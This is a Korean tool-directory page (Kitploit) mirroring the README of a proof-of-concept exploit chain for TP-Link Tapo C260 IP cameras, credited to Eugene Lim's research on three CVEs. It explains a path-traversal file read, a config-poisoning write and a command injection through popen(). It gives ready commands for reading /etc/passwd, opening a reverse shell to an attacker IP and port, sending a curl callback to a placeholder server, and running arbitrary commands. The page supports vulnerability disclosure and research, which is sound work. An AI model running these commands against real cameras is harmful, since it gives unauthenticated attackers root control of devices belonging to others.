Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
tapo-c260-rce — PoC 익스플로잇 체인 — TP-Link Tapo C260 카메라용 CVE-2026-0651/0652/0653. @spaceraccoon의 연구. | Kitploit
도구/GitHubGitHub/l0lsec/tapo-c260-rce
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationHardware HackingPenetration TestingCommand and ControlHardware & IoT SecurityFirmware Analysis
GitHubl0lsec/tapo-c260-rce
125개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

tapo-c260-rce

PoC 익스플로잇 체인 — TP-Link Tapo C260 카메라용 CVE-2026-0651/0652/0653. @spaceraccoon의 연구.

저장소 보기

Tapo C260 RCE 체인 (CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

TP-Link Tapo C260 IP 카메라에 대한 개념 증명 익스플로잇 체인으로, Eugene Lim (Spaceraccoon)이 발견한 세 가지 취약점을 연결하여 비인증 상태에서 루트 권한까지의 RCE를 달성합니다.

크레딧

모든 취약점 연구 및 발견: Eugene Lim (@spaceraccoon)

이 저장소는 그의 공개 글(writeup)을 기반으로 한 PoC 구현입니다. 유용하게 사용하셨다면 그의 책도 구매해 주세요: From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press).

취약점 체인

CVE유형영향
CVE-2026-0651경로 탐색 / 로컬 파일 노출HTTP GET 핸들러의 /%2e%2e%2f를 통해 임의 파일 읽기
CVE-2026-0652임의 설정 쓰기게스트 수준 사용자가 클라우드 API의 JSON 키 조작을 통해 모든 설정 경로에 쓰기 가능
CVE-2026-0653명령 주입 / 권한 상승set_region_code_handle이 검증되지 않은 dev_name 설정 값을 popen()에 전달

킬 체인

root@kitploit:~
LFD (장치 설정 읽기) --> 설정 쓰기 (dev_name 오염) --> 지역 코드 핸들러 트리거 --> popen() --> 셸

요구 사항

  • Python 3.8+
  • 카메라에 대한 네트워크 접근 (LFD용) 또는 유효한 TP-Link 클라우드 인증 토큰 (RCE용)
  • 전체 체인에는 게스트 수준 자격 증명으로 충분합니다

설치

root@kitploit:~
git clone https://github.com/<you>/tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt

사용법

로컬 파일 노출 (CVE-2026-0651)

로컬 네트워크의 카메라에서 임의 파일 읽기:

root@kitploit:~
python lfd.py --host 192.168.1.100 --token <stok_token> --file /etc/passwd

전체 RCE 체인 (CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

root@kitploit:~
# 리버스 셸
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --lhost <YOUR_IP> \
  --lport 4444

# 콜백 전용 (curl ping)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --callback http://your-server.com/pwned

# 사용자 지정 명령
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --cmd "id > /tmp/pwned"

작동 원리

  1. 오염(Poison) — 조작된 JSON 키가 포함된 setLedStatus 요청을 전송하여 장치의 tp_manage/info/dev_name 설정 경로에 셸 메타문자 페이로드를 기록합니다.

  2. 트리거(Trigger) — set_region_code 요청을 전송합니다. 핸들러가 설정에서 dev_name을 읽어 검증 없이 popen() 호출에 삽입하여 주입된 명령을 실행합니다.

  3. 셸(Shell) — 공격자는 콜백 또는 리버스 셸을 수신합니다.

영향을 받는 펌웨어

  • TP-Link Tapo C260 (패치 전 펌웨어)
  • 동일한 /bin/main 옴니버스 바이너리를 공유하는 다른 Tapo 모델도 잠재적으로 영향

면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 저자는 오용에 대해 책임을 지지 않습니다. 소유하지 않은 장치에 대해 테스트하기 전에 항상 명시적 허가를 받으십시오.

참고 자료

  • 원본 글 — Spaceraccoon
  • Kennedn의 Tapo 프로토콜 연구
  • TP-Link 보안 권고
도구 다운로드